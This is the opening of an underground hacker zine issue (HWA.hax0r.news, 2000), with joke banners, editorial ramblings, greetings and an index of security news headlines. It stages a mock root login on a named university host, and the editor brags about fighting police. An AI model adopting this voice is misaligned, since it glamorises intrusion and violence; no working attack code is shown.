20-NOV-2000 SR500 -- SR Telecom -- V4.9 *13:19:31
User name : Log-in menu
User name :HWA
Password :0WNZU
YYZ NOV 200 REV B

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-
== <=-[ HWA.hax0r.news ]-=> ==
===================================================================
[=HWA 2000=] Number 56 Volume 2 Issue *666 *May-Nov 2000 ==
===================================================================

*** SKULLFUCK VERSION MAY-NOV (W/GAPS) 2000 *** CUT'N'PASTE NINJAS ***

NOV 22 2000

Dates are askew, and it's a bit jumbled; normal service will resume shortly,
please take a seat and stand back from the doors. #57 is already in progress
and in more order, we'll back track later if it is possible and fill in the
gap in the history coverage. A LOT has happened that is not covered in this
issue, excuse the mess.
- Ed

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Unix Guru Sex;

"" talk;touch;finger;unzip;strip;mount;fsck;more;fsck;fsck;more;yes;yes;
more;fsck;fsck;yes;yes;yes;umount;sleep ""

... Possible errors;

aborted;child process killed;warning rogue children
I/O error: device too small
module not found: insmod penis

tnx to PP/M/#???
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

You have connected from: r00t3d@well.some.highspeed.net
For assistance call 864-0110 or to report network problems call 864-0200

Login as 'kufacts' for access to the Campus Wide Information System.
'lynx' for access to the World Wide Web using Lynx.
'www' for access to the World Wide Web using Lynx.
'linemode' for access to the World Wide Web using Line Mode.
'history' for history network resources.
'ex-ussr' for former Soviet Union info.
At password prompt hit enter.

Digital UNIX (raven.cc.ukans.edu) (ttyp0)

login: root
Password:
Last successful login for kufacts: Sat Oct 23 13:52:10 2000 from is-nulab-pc14.unl.edu
Last unsuccessful login for kufacts: Fri Apr 11 21:28:26 2000 on ttyp6

Your Terminal type is unknown!
Enter a terminal type: [vt100]
TERMINAL TYPE IS SET TO vt100

The University of Kansas raven.

Connection closed by foreign host.
# _

[15:59] Unexpected socket error: 10038, SSHSocketv2.cpp: 305
[16:00] are there expected errors?

[X] Anarchist party (sic)

"ABUSUS NON TOLLIT USUM"

*666 READ NOTES ON COVERAGE AND THE HIATUS BELOW
===================================================================

"ABANDON HOPE ALL YE WHO ENTER HERE..." - dante's inferno

"because if big brother isn't looking after us, civilization will cease to
exist. Or something." - someone

[ ASCII art: skull and crossbones, by Gilo95' ]

NOTE ABOUT THIS RELEASE: *666 >>>READ<<<<
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

There has been just MUCH too much stuff released to possibly cover but we'll
try if time permits, maybe if i end up in jail i'll use the time to complete
archives of back issues on my assault charges. sigh...

NOTE#1 ORIGINAL PLAN: (Is this it? :[ ] YES [ X] NO )
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OUR LAST RELEASE was number 53 Volume 2 Issue 5 so we will be releasing TWO
versions in a short time, one will be old news near the date of our last
release (this one), the other will be NEW news (current material). The GAP?
will be filled in later, so issues 54 and probably 57 will be released close
together with the gap we missed during the archive's hiatus covered at a
LATER DATE (hopefully, that's the plan anyways.).

NOTE#2 POSSIBLY WHAT YOU ARE READING:(Or is it this? [ X] YES [ ] NO)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

IT IS POSSIBLE YOU ARE HOLDING A HALLOWEEN HELLBOUND VERSION THAT WILL BE AN
UNOFFICIAL OR INCOMPLETE COMPENDIUM OF PAST EVENTS *WITH* THE GAP IN
COVERAGE, (U'LL KNOW UNLESS YER DUMB OR BORED IN WHICH CASE THIS IS ALL
MOOT) IF SUCH IS THE CASE YOU'LL SEE OLD NEWS, A WEIRD GAP OF MASSIVE
PROPORTIONS (MONTHS) AND THEN BOOM, RECENT AND INTERESTING (PRESUMABLY)
MATERIAL NEAR THE MIDDLE OR END.
GOOD LUCK KNOWLEDGE SEEKER, IT IS ALL HERE IF YOU LOOK DEEP ENOUGH. SADLY OLD
URLS DIE QUICKLY (ANOTHER GOOD REASON FOR A WORK SUCH AS THIS) SO YOU MAY JUST
GET THE HNN SNIPPETS OR HNS WRITEUPS BUT NOT THE FULL ARTICLES TO WHICH YOU
ARE ACCUSTOMED. MY APOLOGIES FOR THE MESS AND INDECISION, I AIM TO PLEASE AS
MANY PPL AS POSSIBLE (MAINLY ME) AND THEREFORE NO GUARANTEES ARE IMPLIED AS
TO THE TIMELINESS OR CONSISTENCY OF CONTENT. SUGGEST YOU ENJOY WHAT IS HERE
AND DONT COMPLAIN. :-O

RAMBLINGS OF SOME IMPORTANCE (PROBABLY SHOULD READ EM)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Once again, although referred to as a 'Zine' this is in fact a chronicle or
archive of events for any given time period starting in 1998 and following
through to present, hence my willingness to release issues in such a weird
staggered manner. Get over it, you'll live.

This has several aspects of a zine: some original content (minor), some
exclusive interviews, and logs that will not be found elsewhere, but its main
purpose for being IS and ALWAYS HAS BEEN to act as a reference work covering
as much of the underground and borderline security group releases as possible
(the 'zine' is mostly a one man job and therefore seldom complete or covering
items as extensively as i'd like). It tends to be an overwhelming and large
work whenever it is undertaken but the releases are enjoyed by many, making
it worth my effort (i'm doing this mainly for my own purposes still btw), and
those few dissenters that do emerge are either jealous, people turned down
for membership in the HWA group or just plain "dont get it" and can in fact
fuck off and die for all I care, petulant children and those of bloated
egos...

Anyway with that nonsense said and this little minor irritation and this
explanation out of the way, please read on and enjoy what content i've
decided to include this issue, including releases from the newly formed HWA
Security team (main reason for the hiatus), and check our new site often as a
new format is due to be implemented and many new projects of wonder and awe
are in the works to be released. Check it often, and your input in all
aspects of our group endeavours is encouraged. We currently number 27 in
official active members; these are NOT currently (soon) involved in producing
this work but I intend to bring some that are of like mind on board to help
produce this monstrosity and terrorise small children and sysadmins for many
a year to come.

- Dribbled from Cruci's mind Oct 30th 2000

P.S Do you like how i fluctuate the number of idents from issue to issue? I
dont but it annoys some people and I take pleasure in their squirming. Sorry
for those caught in the cross fire.

RECENT EVENTS: (FACT or FICTION? only the chosen KNOW for sure)
~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

RECENT FACTORS AFFECTING THE WAY THIS WAS PRODUCED:

Sept 23rd FPROPHET AND DICENTRA TIED THE KNOT and got married, congrats!
          same nite: Cruciphux goes to jail charged with assaulting a police
          officer and disturbing the peace (k i got drunk and some people
          hassled me coz of my purple hair, i ended up fighting three cops
          and paying the price.) 24hrs in jail, more time in jail likely
          when trial is over (i beat up three cops, sigh, NOI recommended
          people.)

Sometime  digitized pic of Cruci after his beating by the cops is circulated
          among select people on EFnet. NO you cant request a copy. I'm not
          proud of what happened, it was a fuck up. I fought the law and the
          law won...

Sept 26th Cruci in hospital for a week with infected arm (dont ask), another
          dumb incident, drugs are bad kiddies, stick to pez and beer!
Oct 30th  Court date: put over to Nov 20th, possibility of no jail and merely
          probation although one officer almost had his leg broken. (Oh ya
          dont get on my bad side)

Oct 31st  Arranged poison and razor blades ready for Halloween night and the
          black mass held each samhain in my coven (not).

Nov 20th  Cruci faced 2yrs in jail and $2000 CDN fine but thanks to a good
          lawyer and due to adult situational extenuating circumstances
          received a suspended sentence and 18 months probation. More
          details? dont ask. Be nice to cops kids, be sure those ppl in plain
          clothes aren't the fuzz!

~~~~~~~~ _ _ _ __ _ _ __ _ _ _ ___ _ ~~~~~~~~~~~~~~~~~~~~~~
Inspirational music: NiN, Marilyn Manson, Killdozer
movies: Not the Ninth Gate, Not Mission to Mars, maybe The Haunting,
        The Exorcist, Pitch Black
See a trend?
~~~~~~~~ _ _ _ __ _ _ __ _ _ _ ___ _~~~~~~~~~~~~~~~~~~~~~~~

[ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[]

[ ASCII art banner: PARENTAL ADVISORY 18+ ]

[ WARNING ] [ HALLOWEEN/XMAS EDITION 2000 ] [ EXPLICIT CONTENT ]
[ THIS PRODUCT MAY BE HARMFUL OR FATAL IF INFO IS USED ]
[ BY YOUNG SCRIPT KIDDIES TO ATTACK OR COMPROMISE SERVERS ]
[ DO NOT INTENTIONALLY CONCENTRATE AND INHALE PRODUCT. ]

[ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[]

[ ASCII art banner: NEW P.O.BOX ]

[ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[]

WE HAVE AN UPDATED MAIL DROP ADDRESS:

HWA
P.O BOX 44118
POSTAL OUTLET UNIT #9
ONE WEXFORD ROAD
BRAMPTON, ONTARIO
CANADA
L6Z 4V7

[ -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[] -[]

PRELUDE
~~~~~~~

On a popular breakfast cereal:

The reason it's called "Grape Nuts" is that it contains "dextrose", which
is also sometimes called "grape sugar", and also because "Grape Nuts" is
catchier, in terms of marketing, than "A Cross Between Gerbil Food and
Gravel", which is what it tastes like.
- Dave Barry, "Tips for Writer's:

.,-*-,._.,-*'^'~*-,._.,-*~> *1 <~*-,._.,-*~'^'~*-,._.,-*-,.

HACKING sensibilities do not limit themselves to the realms of computer or
telephone networks, they also extend into art and musical expression. I
coaxed one of our members to share an excerpt of the lyrics from the title
track of their latest cd release (translated from Croatian). - Ed

.,-*-,._.,-*'^'~*-,._.,-*~> *1 <~*-,._.,-*~'^'~*-,._.,-*-,.

"Narko"

"U'r opening the window for a perfect day"
"just like a scene from hollywood movies"
"where luck goes in waves"
"where dust covers all the questions"
"ooooo am I that old that U forget"
"ooooo is he that brave that he takes U"
"that's why there are words"
"for U to lie with them to me"
"that's why hope exists"
"for say once again"
"In my dreams I go to U"
"In my dreams I always go to U"
"In my dreams I always go to U"

Pips, chips & Videoclips (c) 2000

==========================================================================

en·tro·py (ntr-p) n., pl. en·tro·pies.

  1. Symbol S For a closed thermodynamic system, a quantitative measure of
     the amount of thermal energy not available to do work.
  2. A measure of the disorder or randomness in a closed system.
  3. A measure of the number of bits necessary to transmit a message as a
     function of the probability that the message will consist of a specific
     set of symbols.
>>4. A hypothetical tendency for all matter and energy in the universe to
     evolve toward a state of inert uniformity.
>>5. Inevitable and steady deterioration of a system or society.

[ ASCII art banner: BEGIN ]

[root@antiv0re]# whatis life
life: nothing appropriate
[root@antiv0re]# gcc -o god god.c
[root@antiv0re]# ./god
[root@antiv0re]# make clean
[root@antiv0re]# make universe
make: don't know how to make universe. Stop
[root@antiv0re]# make dinner
make: don't know how to make dinner. Stop
[root@antiv0re]#

Ok some greets...

[08:54] Cruciphux: leave me greets in the zine
[08:54] never dont it u gax0r
[08:54] hax0r i mean
[08:55] haha
[08:55] yeah i did once
[08:55] write: pr0ix still w8ing for the automatic k_____
[08:55] :=
[08:55] )
[08:55] i took all the greets out
[08:55] yeah ok
[08:55] thats fair
[08:55] :)
[08:55] where is it?

sorry for bad grammar etc, i'm learnin a little tho.. ;)

pr0ix: dont forget that automatic thingy! you'll get your kl33t HWA shirt ;)
cpt: hiya man, stay the fuck out of trouble ok? you know what i mean.
KrD: Thanks for the interview, hope things work out better than recent shit.
potgirl : hello my friend ;)
slash: what's up bro?
pr0ix/pek/HET/Mixter/Trudel/#informatic #??? : Stay cool brothers!
pip/tnc: bottoms up lads!
And the rest of #darknet, #hwa-security and some other chans i wont bother mentioning coz they dont need the publicity.,, _ _ | |__ (_) _ __ ___ ___ _ __ ___ | '_ \| | |'_ ` _ \ / _ \| '_ ` _ \ | | | | | || | | | | (_) | | | | | | |_| |_|_| || |_| |_|\___/|_| |_| |_| () =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... =-----------------------------------------------------------------------= "If life is a waste of time and time is a waste of life, then lets all get wasted and have the time of our lives" - kf =--------------------------------------------------------------------------= _____ _ _ / ____| | | | | | | ___ _ __ | |_ ___ _ __ | |_ ___ | | / _ \| '_ \| __/ _ \ '_ \| __/ __| | |___| (_) | | | | || __/ | | | |_\__ \ \_____\___/|_| |_|\__\___|_| |_|\__|___/ =--------------------------------------------------------------------------= [ INDEX ] HWA.hax0r.news #666 2000 =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. LEGAL & COPYRIGHTS .............................................. 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. THIS IS WHO WE ARE .............................................. ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. SKULL ASCII: Giles@gevans.demon.co.uk (Gilo) ==SKuLL and CroSSBonES== Wargames:http://roothat.labs.pulltheplug.com/ =--------------------------------------------------------------------------= Source Keys HWA.hax0r.news 2000 =--------------------------------------------------------------------------= "The three most dangerous things in the world are a programmer with a soldering iron, a hardware type with a program patch and a user with an idea." 
- Unknown [MM] - Articles from Mass Media sources (Wired MSNBC Reuters etc) [IND] - Independant articles or unsolicited material. [HWA] - Articles or interviews by HWA Staff members [HNN] - Sourced from the Hacker News Network http://www.hackernews.com/ [HNS] - Sourced from Help Net Security http://net-security.org/ [403] - Sourced from 403-security http://www.403-security.net/ [ISN] - Articles from the ISN Mailing list (usually sourced from media) [b0f] - Buffer Overflow Security release http://b0f.freebsd.lublin.pl/ [zsh] - ZSH release http://zsh.interniq.org/ [COR] - Correction to previous release. =--------------------------------------------------------------------------= Key Content HWA.hax0r.news 2000 =--------------------------------------------------------------------------= only a poor workman blames his tools, unless of course those tools were written by Microsoft :) lol 01.0 .. GREETS ........................................................... 01.1 .. Last minute stuff, rumours, newsbytes ............................ 01.2 .. Mailbag .......................................................... 02.0 .. From the Editor................................................... Note: Contents this issue are in particular disarray and follow no real time line sorry about this but you should find the content interesting and worth reading nonetheless...C*:. 03.0 .. [HNN] May 09'00 ILOVEYOU Investigation Continues 04.0 .. [HNN] May 09'00 Brace Yourselves For the SuperVirus 05.0 .. [HNN] May 09'00 NIPC Accused of Dragging Feet 06.0 .. [HNN] May 09'00 Classified Systems Hit 07.0 .. [HNN] May 09'00 Mitnick in Online Chat 08.0 .. [HNN] May 09'00 Phreakers In the White House 09.0 .. [HNN] May 09'00 MS vs Netscape in Blame for Security Hole 10.0 .. [HNN] May 09'00 Hacker vs. Cracker The Debate Continues 11.0 .. [HNN] May 10'00 Buffer Overflow: The Name Game: Groking the Love Bug 12.0 .. [HNN] May 10'00 New Virus/Worm On The Loose, Friendmess.A 13.0 .. 
[HNN] May 10'00 YTCracker Busted For Web Defacement 14.0 ,, [HNN] May 10'00 Gov Security Laws Introduced At Summit 15.0 .. [HNN] May 10'00 Internet Fraud Complaint Center Launched By DoJ 16.0 .. [HNN] May 10'00 And Yet Another Hole Found In Hotmail 17.0 .. [HNN] May 11'00 Solar Sunrise, Now on Video 18.0 .. [HNN] May 11'00 Network Manager Sent to Jail For Destroying His Network 19.0 .. [HNN] May 11'00 Lawmakers Upset Over ILOVEYOU 20.0 .. [HNN] May 11'00 Intel Motherboards Could Destroy Files 21.0 .. [HNN] May 11'00 Hackers and the Tools They Use 22.0 .. [HNN] May 11'00 HackerNews Brazil and SecureNet Forced To Remove Content 23.0 .. [HNN] May 12'00 ILOVEYOU May Have Been An Accident 24.0 .. [HNN] May 12'00 Windows Labeled 'Virus Friendly' 25.0 .. [HNN] May 12'00 PBS Looses Subscriber Info 26.0 .. [HNN] May 12'00 Anonymous User Sues Yahoo For Releasing Identity 27.0 .. [HNN] May 12'00 Smart Cards Labeled Secure 28.0 .. [HNN] May 12'00 Cyber Attackers on Television 29.0 .. [HNN] May 15'00 Love Bug Suspect Denies All 30.0 .. [HNN] May 15'00 Microsoft Found to Be Threat to National Security 31.0 .. [HNN] May 15'00 G8 to Discuss Cybercrime 32.0 .. [HNN] May 15'00 VA Described as Wide Open To Attack 33.0 .. [HNN] May 15'00 Bank Web Site Breached 34.0 .. [HNN] May 15'00 Koreans Host 'Hacking Contest' 35.0 .. [HNN] May 15'00 America's Most Wanted Hit with DoS 36.0 .. [HNN] May 15'00 Greisling Responds 37.0 .. [HNN] May 17'00 Microsoft Security Spanked Again 38.0 .. [HNN] May 17'00 Canada's Big Brother Revealed 39.0 .. [HNN] May 17'00 Code on Disk Points Finger At Suspect 40.0 .. [HNN] May 17'00 List of ILOVEYOU Suspects Grows 41.0 .. [HNN] May 17'00 Return of the Phreaker 42.0 .. [HNN] May 17'00 Hope 2000 Announces Plans 43.0 .. [HNN] May 17'00 More and more E-zines 44.0 .. [HNN] May 18'00 UCITA May Help Computer Attackers 45.0 .. [HNN] May 18'00 H.R.3489 To Limit Eavesdropping 46.0 .. [HNN] May 18'00 Congressional Records Reveals Officers Social Security Numbers 47.0 .. 
[HNN] May 18'00 G8 Finds No Quick Fix For Cyber Crime 48.0 .. [HNN] May 18'00 Philippines Has No CyberCrime Law - Suspect Can Not be Prosecuted 49.0 .. [HNN] May 18'00 Multiple Holes Found in Kerberos 50.0 .. [HNN] May 18'00 Interview with OpenBSD Creator 51.0 .. [HNN] May 18'00 RIAA Looking For Targets 52.0 .. [HNN] May 18'00 Canadian BB DB Clippings 53.0 .. [HNN] May 19'00 NewLove - Dangerous Variant on the Loose 54.0 .. [HNN] May 19'00 Old CIA Head Warns of Spy-Viruses 55.0 .. [HNN] May 19'00 Fed Slow In Virus Reaction 56.0 .. [HNN] May 19'00 FCC's Attempted Expansion of CALEA In Court 57.0 .. [HNN] May 19'00 Russian Computer Crime on the Rise 58.0 .. [HNN] May 19'00 J0n Pleads Guilty in Canada 59.0 .. [HNN] May 19'00 Electronically Attacking a Bank 60.0 .. [HNN] May 22'00 NAI Removes NetBus Pro from Scanner 61.0 .. [HNN] May 22'00 Brits Lose Another Laptop 62.0 .. [HNN] May 22'00 State Department Audits Missing Laptops 63.0 .. [HNN] May 22'00 Researchers Develop New Breed of Security Tool 64.0 .. [HNN] May 22'00 Original ILOVEYOU Author Surfaces in Australia 65.0 .. [HNN] May 23'00 Secret Searches Reintroduced to Congress 66.0 .. [HNN] May 23'00 FTC Wants Control Over Privacy 67.0 .. [HNN] May 23'00 Computer Attackers To get Even Higher Sentences 68.0 .. [HNN] May 23'00 Australia Loses Sensitive Laptops 69.0 .. [HNN] May 23'00 Hong Kong to Create Cyber Response Team 70.0 .. [HNN] May 23'00 South Africa Forms CyberCrime Unit 71.0 .. [HNN] May 24'00 Info-Con Ratings To Be Used for Cyber Threats 72.0 .. [HNN] May 24'00 Ticketmaster to Sell RootFest Tickets 73.0 .. [HNN] May 24'00 Zero-Knowledge Teams With IBM 74.0 .. [HNN] May 24'00 The Little Miscreants That Could 75.0 .. [HNN] May 24'00 French Say No Anonymity on Web 76.0 .. [HNN] May 24'00 Experts Stress Education Over Laws 77.0 .. [HNN] May 25'00 NHL Hit with DDoS 78.0 .. [HNN] May 25'00 FCC Rules Under Appeal 79.0 .. [HNN] May 25'00 Privacy Issue Still Hot In DC 80.0 .. 
[HNN] May 25'00 Australia Electoral Information Sold For Tax Mailing 81.0 .. [HNN] May 25'00 Cybercops Meet in Boston 82.0 .. [HNN] May 25'00 CERT Releases Advisory on Week Old Issue 83.0 .. [HNN] May 26'00 Physical Security Is Real Weak 84.0 .. [HNN] May 26'00 Reno Does About Face 85.0 .. [HNN] May 26'00 Extortionist Busted 86.0 .. [HNN] May 26'00 Australian Man Leaks Sewage Via Computer and Radio 87.0 .. [HNN] May 26'00 2600 Keeps Lawyer 88.0 .. [HNN] May 26'00 Preliminary Defcon Speaking Schedule 89.0 .. [HNN] May 26'00 Underground Site Form Alliance 90.0 .. [HNN] May 30'00 Viruses, Viruses, and more Viruses 91.0 .. [HNN] May 30'00 Resume on the Loose 92.0 .. [HNN] May 30'00 Gauntlet Firewall Breached 93.0 .. [HNN] May 30'00 Software Glitch Short Changes Lottery Winners 94.0 .. [HNN] May 30'00 Cyberstalking: Hype or Reality 95.0 .. [HNN] May 30'00 Sexy Geeks and Hackers 96.0 .. [HNN] May 30'00 DC Metro Web Site Defaced 97.0 .. [HNN] May 30'00 Mitnick to Challenge Computer Ban 98.0 .. [HNN] May 30'00 Black Hat Posts Speaker Lists, Adds Old Video Clips 99.0 .. [IND] Pokemon virus hits U.S targetting kids 100.0 .. [HNN] May 31'00 Canada To Dismantle Big Bro Database 101.0 .. [HNN] May 31'00 Resume Causes Little Damage 102.0 .. [HNN] May 31'00 Hong Kong Pirate Piracy Troubles 103.0 .. [HNN] May 31'00 New Zealand Man Claims Virus Info Stolen 104.0 .. [HNN] May 31'00 Bank Manager Executed 105.0 .. [HNN] May 31'00 Malaysian ISP Suffers Human Error Security Breach 106.0 .. [HNN] May 31'00 Defcon Updates Web Site 107.0 .. [HNN] May 31'00 SWAT Hits Issue 29 108.0 .. [HNN] June 01'00 Pennsylvania Passes Anti-Virus Law 109.0 .. [HNN] June 01'00 MLB Practices Security Through Obscurity 110.0 .. [HNN] June 01'00 Pr0n Detection Software 111.0 .. [HNN] June 01'00 Fighting the Privacy Bootleggers 112.0 .. [HNN] June 01'00 Marcia Clark Calls Hackers "Undersocialized Schizoids" 113.0 .. [HNN] June 01'00 Fake Census Takers on the Prowl 114.0 .. 
[HNN] June 02'00 Top Ten Internet Security Problems 115.0 .. [HNN] June 02'00 MPAA Attempts to Bar Press From Hearings 116.0 .. [HNN] June 02'00 Anti-Virus Vendors Blame Media for Virus Hype 117.0 .. [HNN] June 02'00 Summercon 2000 118.0 .. [HNN] June 02'00 India's First Cyber Criminal Arrested 119.0 .. [HNN] June 02'00 Libnet for NT Now Available 120.0 .. [HNN] June 05'00 FW-1 Vulnerable to Fragmented Packets 121.0 .. [HNN] June 05'00 Australian Tax Office Sells Private Info 122.0 .. [HNN] June 05'00 British Have Lost Dozens of Laptops 123.0 .. [HNN] June 05'00 S.2448 Analysis 124.0 .. [HNN] June 05'00 Spammer Busted For Online Tampering 125.0 .. [HNN] June 05'00 Cell Phone Viruses? 126.0 .. [HNN] June 07'00 SPAM Worm Hits Cell Phones In Spain 127.0 .. [HNN] June 07'00 MafiaBoy to Get New Charges 128.0 .. [HNN] June 07'00 CheckPoint Posts Temp Fix for FW-1 Vulnerability 129.0 .. [HNN] June 07'00 Air Force Blocks Access to Museum Web Site 130.0 .. [HNN] June 07'00 Mounties Fall Behind Crooks in Online Crime 131.0 .. [HNN] June 08'00 Accused in ILOVEYOU virus case set free 132.0 .. [HNN] June 08'00 Kevin Mitnick Talks About Jobs in Computer Security 133.0 .. [HNN] June 08'00 Australia passes law legalizing government computer intrusions 134.0 .. [HNN] June 08'00 Press allowed to cover MPAA depositions 135.0 .. [HNN] June 08'00 Vulnerability in free mail services found 136.0 .. [HNN] June 08'00 OnStar service can unlock car doors 137.0 .. [HNN] June 09'00 Thousands of trojaned computers found 138.0 .. [HNN] June 09'00 Investigative Report: Female Hackers 139.0 .. [HNN] June 09'00 ISS founder is a white hat hacker 140.0 .. [HNN] June 09'00 80,000 DNS Domain Server Vulnerable 141.0 .. [HNN] June 09'00 Lewis Koch on Winn Schwartau 142.0 .. [HNN] June 09'00 Television takes on computer crime 143.0 .. [HNN] June 09'00 Top 50 Security Tools Survey 144.0 .. [HNN] June 12'00 NETSEC Discovers Nothing New 145.0 .. 
[HNN] June 12'00 Brazilian Telephone Users Privacy Breached 146.0 .. [HNN] June 12'00 Dozens of Malaysian Sites Defaced 147.0 .. [HNN] June 12'00 Return of FidNet 148.0 .. [HNN] June 12'00 H2K Update: Movie Premier, Speaker List 149.0 .. [HNN] June 12'00 Another ILOVEYOU Variant Found 150.0 .. [HNN] June 12'00 Radio Interferer Gets Five Years 151.0 .. [HNN] June 12'00 Indonesian Arrested in Australia For Attacking Singapore 152.0 .. [HNN] June 12'00 Evidence to Support Cell Phone Ban Now Available 153.0 .. [HNN] June 13'00 Hard Drives With Nuke Secrets Disappear 154.0 .. [HNN] June 13'00 Police Stumble onto Pirates 155.0 .. [HNN] June 13'00 Social Aspects of the Love Bug 156.0 .. [HNN] June 13'00 Interview with Bruce Schneier 157.0 .. [HNN] June 13'00 IC-Crypt 128 Goes Freeware 158.0 .. [HNN] June 13'00 IronBox Releases New Articles 159.0 .. [HNN] June 13'00 Hong Kong Government Defaced, Again 160.0 .. [HNN] June 14'00 RootFest Opens Today 161.0 .. [HNN] June 14'00 Email Hoax Panics Credit Card Holders 162.0 .. [HNN] June 14'00 FAA Fails to Conduct Background Checks on Computer Contractors 163.0 .. [HNN] June 14'00 @stake Announces Technical Advisory Board 164.0 .. [HNN] June 14'00 Site Forced to Hand Over User Identities 165.0 .. [HNN] June 14'00 ITN Email Compromised 166.0 .. [HNN] June 15'00 Philippine President Signs Computer Crime Law 167.0 .. [HNN] June 15'00 MPAA vs 2600 Transcripts Released 168.0 .. [HNN] June 15'00 Raytheon Unveils SilentRunner 169.0 .. [HNN] June 15'00 30 year Old Security Report Still Useful 170.0 .. [HNN] June 15'00 15 yr old Receives Classified Documents 171.0 .. [HNN] June 15'00 Underground Tools 172.0 .. [HNN] June 16'00 Political Candidates Deface Web Pages 173.0 .. [HNN] June 16'00 Mitnick Seeks to Renew Ham License 174.0 .. [HNN] June 16'00 Value of Microsoft Trash On the Rise 175.0 .. [HNN] June 16'00 China Sentences Man to Death 176.0 .. [HNN] June 16'00 OpenBSD 2.7 Now Available 177.0 .. 
[HNN] June 16'00 RootFest Ends Today 178.0 .. [HNN] June 16'00 White Paper: Internet Identity Theft 179.0 .. [HNN] June 16'00 New Ezines 180.0 .. [HNN] June 19'00 AOL Confirms Compromise 181.0 .. [HNN] June 19'00 College of Dupage Make Unfounded Claims Regarding CyberCop School 182.0 .. [HNN] June 19'00 Los Alamos Hard Drives Found 183.0 .. [HNN] June 19'00 Japanese Exercise CyberCrime Law 184.0 .. [HNN] June 19'00 Anti Pedophile Groups Take on the Net 185.0 .. [HNN] June 19'00 More E-Zines 186.0 .. [HNN] June 20'00 Stages Virus Starts to Become Widespread 187.0 .. [HNN] June 20'00 Employees Sue Employer For Firing Over NetBus 188.0 .. [HNN] June 20'00 The Cyberterror Scare of 2000 189.0 .. [HNN] June 20'00 AOL Increases Network Security 190.0 .. [HNN] June 20'00 Poll Says Americans Are Afraid of CyberCrime 191.0 .. [HNN] June 20'00 Cyber Defense Still Looked at As Part of Cold War 192.0 .. [HNN] June 20'00 FAA Opens Cyber Security Office 193.0 .. [HNN] June 21'00 Credit Taken for Stages Worm 194.0 .. [HNN] June 21'00 Drug Office Tracks Web Visitors 195.0 .. [HNN] June 21'00 NATO Unleashes Offensive Cyberwar Weapon 196.0 .. [HNN] June 21'00 Mexico Hires Hackers To Crack Password 197.0 .. [HNN] June 21'00 Privacy Issues Get Attention In Congress 198.0 .. [HNN] June 21'00 More Speakers for H2K 199.0 .. [HNN] June 22'00 White House Supports P3P 200.0 .. [HNN] June 22'00 FSA Calls Bank Security Weak 201.0 .. [HNN] June 22'00 Nike.com Redirected 202.0 .. [HNN] June 22'00 Cybercafes labeled 'Electronic Heroin' 203.0 .. [HNN] June 22'00 Freeware Available to Track Napster Users 204.0 .. [HNN] June 22'00 ECTF labeled Cyber-Mod Squad 205.0 .. [HNN] June 22'00 Eleven Story Tall Tetris Game 206.0 .. [HNN] June 23'00 DMCA Hearings Held By US Copyright Office 207.0 .. [HNN] June 23'00 COPA Appeal Rejected! 208.0 .. [HNN] June 23'00 Mitnick Back In Court 209.0 .. [HNN] June 23'00 Security Glitch Brings Lawsuit 210.0 .. 
[HNN] June 23'00 UAE Files Charges Against British Worker 211.0 .. [HNN] June 23'00 Feedback on Female Hackers 212.0 .. [HNN] June 23'00 Online Retailers Don't Provide Adequate Security 213.0 .. [HNN] June 23'00 Better to Be Scared Than Sorry? 214.0 .. [HNN] June 23'00 Snooping Enters the Mainstream 215.0 .. [HNN] June 26'00 24,000 Credit Card Numbers At Risk 216.0 .. [HNN] June 26'00 Russians Introduce Cyber Doctrine 217.0 .. [HNN] June 26'00 Mitnick In Court Today 218.0 .. [HNN] June 26'00 More Info Reported Missing At Los Alamos 219.0 .. [HNN] June 26'00 The HoneyNet Research Project 220.0 .. [HNN] June 26'00 Cell Phones And Driving Don't Mix 221.0 .. [HNN] June 26'00 New Viruses Attack The Soul 222.0 .. [HNN] June 26'00 Traditional Hackers Upset Over Use of Term 223.0 .. [HNN] June 27'00 Oracle Admits to Spying on Microsoft 224.0 .. [HNN] June 27'00 FBI To Investigate Stages Worm 225.0 .. [HNN] June 27'00 Mattel Will Remove Spyware 226.0 .. [HNN] June 27'00 Russia Accuses Lithuanian of Hacking For The US 227.0 .. [HNN] June 27'00 BSA Settles With 20 Companies 228.0 .. [HNN] June 27'00 UAE Telecom Firm Will Prosecute 229.0 .. [HNN] June 28'00 Oracle Admits to Spying on Microsoft 230.0 .. [IND] UK: White-hat Hacker Engaged In Black Arts 231.0 .. [IND] India: Licensed To Bill - `Ethical Hackers' Get Paid To Crack E-security. 232.0 .. [IND] Hackers Shoot, Score On NHL Web Site 233.0 .. [IND] Computer whiz alters high school's gradess 234.0 .. [HNN] Jun 29'00 Australian Tax Office Allegedly Compromised 235.0 .. [HNN] Jun 29'00 AOL Tells FCC That IM Security Is Top Priority 236.0 .. [HNN] Jun 29'00 McCain Still Pushing for Filtering 237.0 .. [HNN] Jun 29'00 Lawsuit Filed Over Nike Redirection 238.0 .. [HNN] Jun 29'00 eCrime Documentary 239.0 .. [HNN] Jun 29'00 E-mail Used As Evidence In Korea 240.0 .. [HNN] Jun 30'00 AOL Users 